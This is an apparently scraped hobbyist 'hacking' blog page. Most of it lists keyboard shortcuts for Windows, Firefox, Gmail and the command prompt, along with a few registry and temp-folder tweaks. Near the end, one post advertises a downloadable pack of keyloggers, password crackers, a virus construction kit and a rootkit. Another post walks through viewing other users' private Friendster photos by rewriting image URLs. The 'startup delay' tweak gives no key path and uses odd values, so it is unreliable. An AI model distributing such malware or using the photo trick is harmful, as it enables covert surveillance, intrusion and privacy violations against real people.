* Ctrl + Up: Move cursor to beginning of previous paragraph. This and all subsequent Up/Down hotkeys in this section have only been known to work in RichEdit controls.
* Ctrl + Down: Move cursor to beginning of next paragraph.
* Shift + Left: Highlight one character to the left.
* Shift + Right: Highlight one character to the right.
* Shift + Up: Highlight from current cursor position, to one line up.
* Shift + Down: Highlight from current cursor position, to one line down.
* Ctrl + Shift + Left: Highlight to beginning of previous word.
* Ctrl + Shift + Right: Highlight to beginning of next word.
* Ctrl + Shift + Up: Highlight to beginning of previous paragraph.
* Ctrl + Shift + Down: Highlight to beginning of next paragraph.
* Home: Move cursor to top of a scrollable control.
* End: Move cursor to bottom of a scrollable control.
4.) Generic File Browser
* Arrow Keys: Navigate.
* Shift + Arrow Keys: Select multiple items.
* Ctrl + Arrow Keys: Change focus without changing selection. "Focus" is the object that will run on Enter. Space toggles selection of the focused item.
* (Letter): Select first found item that begins with (Letter).
* BackSpace: Go up one level to the parent directory.
* Alt + Left: Go back one folder.
* Alt + Right: Go forward one folder.
* Enter: Activate (Double-click) selected item(s).
* Alt + Enter: View properties for selected item.
* F2: Rename selected item(s).
* Ctrl + NumpadPlus: In a Details view, resizes all columns to fit the longest item in each one.
* Delete: Delete selected item(s).
* Shift + Delete: Delete selected item(s); bypass Recycle Bin.
* Ctrl while dragging item(s): Copy.
* Ctrl + Shift while dragging item(s): Create shortcut(s).
* In tree pane, if any:
* Left: Collapse the current selection if expanded, or select the parent folder.
* Right: Expand the current selection if collapsed, or select the first subfolder.
* NumpadAsterisk: Expand currently selected directory and all subdirectories. No undo.
* NumpadPlus: Expand currently selected directory.
* NumpadMinus: Collapse currently selected directory.
5.) Accessibility
* Right Shift for eight seconds: Toggle FilterKeys on and off. FilterKeys must be enabled.
* Left Alt + Left Shift + PrintScreen: Toggle High Contrast on and off. High Contrast must be enabled.
* Left Alt + Left Shift + NumLock: Toggle MouseKeys on and off. MouseKeys must be enabled.
* NumLock for five seconds: Toggle ToggleKeys on and off. ToggleKeys must be enabled.
* Shift five times: Toggle StickyKeys on and off. StickyKeys must be enabled.
* 6.) Microsoft Natural Keyboard with IntelliType Software Installed
* Win + L: Log off Windows.
* Win + P: Open Print Manager.
* Win + C: Open control panel.
* Win + V: Open clipboard.
* Win + K: Open keyboard properties.
* Win + I: Open mouse properties.
* Win + A: Open Accessibility properties.
* Win + Space: Displays the list of Microsoft IntelliType shortcut keys.
* Win + S: Toggle CapsLock on and off.
7.) Remote Desktop Connection Navigation
* Ctrl + Alt + End: Open the NT Security dialog.
* Alt + PageUp: Switch between programs.
* Alt + PageDown: Switch between programs in reverse.
* Alt + Insert: Cycle through the programs in most recently used order.
* Alt + Home: Display start menu.
* Ctrl + Alt + Break: Switch the client computer between a window and a full screen.
* Alt + Delete: Display the Windows menu.
* Ctrl + Alt + NumpadMinus: Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing Alt + PrintScreen on a local computer.
* Ctrl + Alt + NumpadPlus: Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PrintScreen on a local computer.
8.) Mozilla Firefox Shortcuts
* Ctrl + Tab or Ctrl + PageDown: Cycle through tabs.
* Ctrl + Shift + Tab or Ctrl + PageUp: Cycle through tabs in reverse.
* Ctrl + (1-9): Switch to tab corresponding to number.
* Ctrl + N: New window.
* Ctrl + T: New tab.
* Ctrl + L or Alt + D or F6: Switch focus to location bar.
* Ctrl + Enter: Open location in new tab.
* Shift + Enter: Open location in new window.
* Ctrl + K or Ctrl + E: Switch focus to search bar.
* Ctrl + O: Open a local file.
* Ctrl + W: Close tab, or window if there's only one tab open.
* Ctrl + Shift + W: Close window.
* Ctrl + S: Save page as a local file.
* Ctrl + P: Print page.
* Ctrl + F or F3: Open find toolbar.
* Ctrl + G or F3: Find next...
* Ctrl + Shift + G or Shift + F3: Find previous...
* Ctrl + B or Ctrl + I: Open Bookmarks sidebar.
* Ctrl + H: Open History sidebar.
* Escape: Stop loading page.
* Ctrl + R or F5: Reload current page.
* Ctrl + Shift + R or Ctrl + F5: Reload current page; bypass cache.
* Ctrl + U: View page source.
* Ctrl + D: Bookmark current page.
* Ctrl + NumpadPlus or Ctrl + Equals (+/=): Increase text size.
* Ctrl + NumpadMinus or Ctrl + Minus: Decrease text size.
* Ctrl + Numpad0 or Ctrl + 0: Set text size to default.
* Alt + Left or Backspace: Back.
* Alt + Right or Shift + Backspace: Forward.
* Alt + Home: Open home page.
* Ctrl + M: Open new message in integrated mail client.
* Ctrl + J: Open Downloads dialog.
* F6: Switch to next frame. You must have selected something on the page already, e.g. by use of Tab.
* Shift + F6: Switch to previous frame.
* Apostrophe ('): Find link as you type.
* Slash (/): Find text as you type.
9.) GMail
* Note: Must have "keyboard shortcuts" on in settings.
* C: Compose new message.
* Shift + C: Open new window to compose new message.
* Slash (/): Switch focus to search box.
* K: Switch focus to the next most recent email. Enter or "O" opens focused email.
* J: Switch focus to the next oldest email.
* N: Switch focus to the next message in the "conversation." Enter or "O" expands/collapses messages.
* P: Switch focus to the previous message.
* U: Takes you back to the inbox and checks for new mail.
* Y: Various actions depending on current view:
* Has no effect in "Sent" and "All Mail" views.
* Inbox: Archive email or message.
* Starred: Unstar email or message.
* Spam: Unmark as spam and move back to "Inbox."
* Trash: Move back to "Inbox."
* Any label: Remove the label.
* X: "Check" an email. Various actions can be performed against all checked emails.
* S: "Star" an email. Identical to the more familiar term, "flagging."
* R: Reply to the email.
* A: Reply to all recipients of the email.
* F: Forward an email.
* Shift + R: Reply to the email in a new window.
* Shift + A: Reply to all recipients of the email in a new window.
* Shift + F: Forward an email in a new window.
* Shift + 1 (!): Mark an email as spam and remove it from the inbox.
* G then I: Switch to "Inbox" view.
* G then S: Switch to "Starred" view.
* G then A: Switch to "All Mail" view.
* G then C: Switch to "Contacts" view.
* G then S: Switch to "Drafts" view.
10.) List of F1-F9 Key Commands for the Command Prompt
* F1 / right arrow: Repeats the letters of the last command line, one by one.
* F2: Displays a dialog asking user to "enter the char to copy up to" of the last command line
* F3: Repeats the last command line
* F4: Displays a dialog asking user to "enter the char to delete up to" of the last command line
* F5: Goes back one command line
* F6: Enters the traditional CTRL+Z (^z)
* F7: Displays a menu with the command line history
* F8: Cycles back through previous command lines (beginning with most recent)
* F9: Displays a dialog asking user to enter a command number, where 0 is for first command line entered.
* Alt+Enter: toggle fullScreen mode.
* up/down: scroll thru/repeat previous entries
* Esc: delete line
Please Leave your Comment or Suggestion Thanks
Courtsy of crack0hack.wetpaint.com
Posted by Hackers Singson at 5:23 PM 0 comments
Hacking AIO 2007-2008
This is a little pack created for
educational purposes only.
It contains the Following Porgrams.
-Dark Keylogger
-Elite Keylogger 3.0
-tiny keylogger 1.0
-EverQuest Forum
-Premium Downloads Tutorial
Brute Force
-L0phtCrack 2.52
-MD5 Toolbox 1.0.exe
Construction Kits
-Html Virus ConstructionKit 2.0
Root Kits
-Windows RootKit
Download Link: http://rapidshare.com/files/86444713/Hacking_AIO_2007-2008.zip
Posted by Hackers Singson at 5:20 PM 0 comments
Can u Delete Recycle Bin?
1 thing is 4 sure, delete option can be added 2 recycle bin...
the old registry thing will work out.....
* launch d registry...
* open HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder
* to add a rename and delete option, change the Dword attribute to 70 01 00 20
* refresh and reboot the system..... u r done.
PS: always backup ur data as well as registry b4 attempting 2 work on it if u r a newbie....
Courtsy of crack0hack.wetpaint.com
Posted by Hackers Singson at 5:17 PM 0 comments
Aight so u wanna know how to turn the pc on in 10 seconds (may vary)Aight heres what u have to do to turn ur pc on in 10 seconds
Aite Click on the start button then press R it will take u to Run well go to run
n type Regedit
press enter
this will open Registery Editor
now look for the key
now there find the Key Called
"Startup Delay"
Double Click On It
Now where its Base
Click Decimal
Now its Default Value Is 4800000 (75300:hexadecimal)
Change The Value To 40000
here u go u have done it
now close the Registery Editor and Restart Your Computer
Courtsy of crack0hack.wetpaint.com
Posted by Hackers Singson at 5:17 PM 0 comments
ll what i prefer is %temp% " without quotes.. at Start -> Run..
this opens ur temp folder n den u cal erase it neatly// still try dis one too..
First go into gpedit.msc
Next select -> Computer Configuration/Administrative Templates/Windows Components/Terminal Services/Temporary Folder
Then right click "Do Not Delete Temp Folder Upon Exit"
Go to properties and hit disable. Now next time Windows puts a temp file in that folder it will automatically delete it when its done! Note from Forum Admin: Remember, GPEDIT (Group Policy Editor) is only available in XP Pro.
Posted by Hackers Singson at 5:16 PM 0 comments
How to Hack Private Friendster Photos
Guide How to View Private Folder Friendster Pictures
open Ur Friend’s friendster URL…
Suppose Your Friend’s Friendster Id is : http://www.friendster.com/user.php?uid=39157026
When u try to open and view private photos, you get, stopped.
That time the URL is :
Now ur taken to Friendster Private Photos Requestition Page
just do this
–> Right Click –> properties –> clickURL image properties…
You get a URL as :
modify www –> photos
and Modify image-server.php –>photos
Now u get : http://photos.friendster.com/photos/35/88/39157026/33403760906_private_m.jpg
Copy and Paste URL address to your browser and view friendster private photo’s
so guys, watch out with uploading Ur photo’s….Coz, Nothing secure in Internet, also Private Photos of Friendster
Courtsy of http://blog.xmodx.com
Posted by Hackers Singson at 1:39 AM 0 comments